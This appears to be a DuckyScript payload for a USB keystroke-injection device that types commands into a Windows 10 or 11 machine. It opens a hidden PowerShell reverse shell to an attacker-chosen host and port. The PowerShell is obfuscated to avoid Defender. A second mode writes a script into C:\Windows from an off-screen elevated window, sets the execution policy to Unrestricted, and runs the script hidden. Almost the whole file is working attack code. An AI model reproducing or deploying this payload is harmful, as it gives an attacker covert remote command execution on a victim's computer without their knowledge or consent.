REM Title: Villain Windows reverse shell
REM Author: Corti Aurel & Jaeggli David
REM Description: Builds up a revershe shell to a desired target without disabling Defender
REM Target: Windows 10 & 11 Computers

ATTACKMODE HID

REM Do NOT change. These are defines for different modes of attack
REM To set desired attack define one of these in the #A_MODE constant below
DEFINE #PS_DIRECT 0
DEFINE #WITH_NOTEPAD 1

REM desired attack mode, available modes are defined above
DEFINE #A_MODE #PS_DIRECT 

REM Host to connect to, default port of villain shell is 4443
DEFINE #LHOST 192.168.178.33
DEFINE #LPORT 4443

IF (#A_MODE == #PS_DIRECT) THEN
    REM_BLOCK
    Description: opens a powershell with user privileges, inserts the revershe shell string and executes it
    Usually takes around 12-13s to execute
    END_REM

    REM opening delay
    DELAY 1000
    
    REM open powershell
    GUI r
    DELAY 100
    STRING powershell.exe
    ENTER
    DELAY 500
    
    REM insert string generated by the Villain shell with additional variable obfuscation
    STRING_BASH
        Start-Process $PSHOME\powershell.exe -ArgumentList {$4a4148522a694147bcce90997fb06df4 = New-Object System.Net.Sockets.TCPClient
        ('#LHOST',#LPORT);$19f543240a82424a96749c25b23c8cd0 = $4a4148522a694147bcce90997fb06df4.GetStream();[byte[]]$d547ebc161434f699b9ad6e84b317981 
        = 0..65535|%{0};while(($i = $19f543240a82424a96749c25b23c8cd0.Read($d547ebc161434f699b9ad6e84b317981, 0, 
        $d547ebc161434f699b9ad6e84b317981.Length)) -ne 0){;$df92b74a3b244c3abbd8bb0ac5c1f881 = (New-Object -TypeName System.Text.ASCIIEncoding).
        GetString($d547ebc161434f699b9ad6e84b317981,0, $i);$8c114f0355af4b2b971ad80bf328b334 = (i''e''x $df92b74a3b244c3abbd8bb0ac5c1f881 2>&1 | Out-String );
        $8c114f0355af4b2b971ad80bf328b3342 = $8c114f0355af4b2b971ad80bf328b334 + 'P''S ' + (p''w''d).Path + '> ';
        $dd867e14389346deba72505224959626 = ([text.encoding]::ASCII).GetBytes($8c114f0355af4b2b971ad80bf328b3342);$19f543240a82424a96749c25b23c8cd0.
        Write($dd867e14389346deba72505224959626,0,$dd867e14389346deba72505224959626.Length);$19f543240a82424a96749c25b23c8cd0.Flush()};
        $4a4148522a694147bcce90997fb06df4.Close()} -WindowStyle Hidden
    END_STRING
    
    ENTER
    DELAY 500

    REM close current powershell
    ALT F4

ELSE IF (#A_MODE == #WITH_NOTEPAD) THEN
    REM_BLOCK
    WARNING: user needs administrator privileges without entering a password
    
    Description: opens editor as administrator, moves the window down until it is out of focus,
    inserts the revershe shell string, the file in a .ps1 file and executes it.
    
    Does currently NOT work on my machine :)
    END_REM

    DELAY 750  
    GUI r 
    DELAY 1000
    STRING powershell Start-Process notepad -Verb runAs
    ENTER
    DELAY 750  
    ALT y 
    DELAY 750  
    ENTER
    ALT SPACE 
    DELAY 1000
    STRING m 
    DELAY 1000
    DOWNARROW
    REPEAT 100
    ENTER
    STRING Add-Content "Start-Process $PSHOME\powershell.exe -ArgumentList {$4a4148522a694147bcce90997fb06df4 = New-Object System.Net.Sockets.TCPClient('#LHOST',#LPORT);$19f543240a82424a96749c25b23c8cd0 = $4a4148522a694147bcce90997fb06df4.GetStream();[byte[]]$d547ebc161434f699b9ad6e84b317981 = 0..65535|%{0};while(($i = $19f543240a82424a96749c25b23c8cd0.Read($d547ebc161434f699b9ad6e84b317981, 0, $d547ebc161434f699b9ad6e84b317981.Length)) -ne 0){;$df92b74a3b244c3abbd8bb0ac5c1f881 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($d547ebc161434f699b9ad6e84b317981,0, $i);$8c114f0355af4b2b971ad80bf328b334 = (i''e''x $df92b74a3b244c3abbd8bb0ac5c1f881 2>&1 | Out-String );$8c114f0355af4b2b971ad80bf328b3342 = $8c114f0355af4b2b971ad80bf328b334 + 'P''S ' + (p''w''d).Path + '> ';$dd867e14389346deba72505224959626 = ([text.encoding]::ASCII).GetBytes($8c114f0355af4b2b971ad80bf328b3342);$19f543240a82424a96749c25b23c8cd0.Write($dd867e14389346deba72505224959626,0,$dd867e14389346deba72505224959626.Length);$19f543240a82424a96749c25b23c8cd0.Flush()};$4a4148522a694147bcce90997fb06df4.Close()} -WindowStyle Hidden"
    ENTER
    STRING start-Process powershell.exe -windowstyle hidden "$env:TEMP\95598.ps1"
    ENTER
    
    STRING Remove-Item $MyINvocation.InvocationName 
    ENTER
    CTRL s
    DELAY 1000
    STRING C:\Windows\config-95598.ps1
    ENTER
    DELAY 1000
    ALT F4 
    DELAY 750  
    GUI r 
    DELAY 750  
    STRING powershell Start-Process cmd -Verb runAs 
    ENTER
    DELAY 750  
    ALT y 
    DELAY 1000
    STRING mode con:cols=14 lines=1 
    ENTER
    ALT SPACE 
    DELAY 750  
    STRING m 
    DELAY 750   
    DOWNARROW 
    REPEAT 100
    ENTER
    STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
    ENTER
    DELAY 750
    STRING powershell.exe -windowstyle hidden -File C:\Windows\config-95598.ps1
    ENTER
END_IF
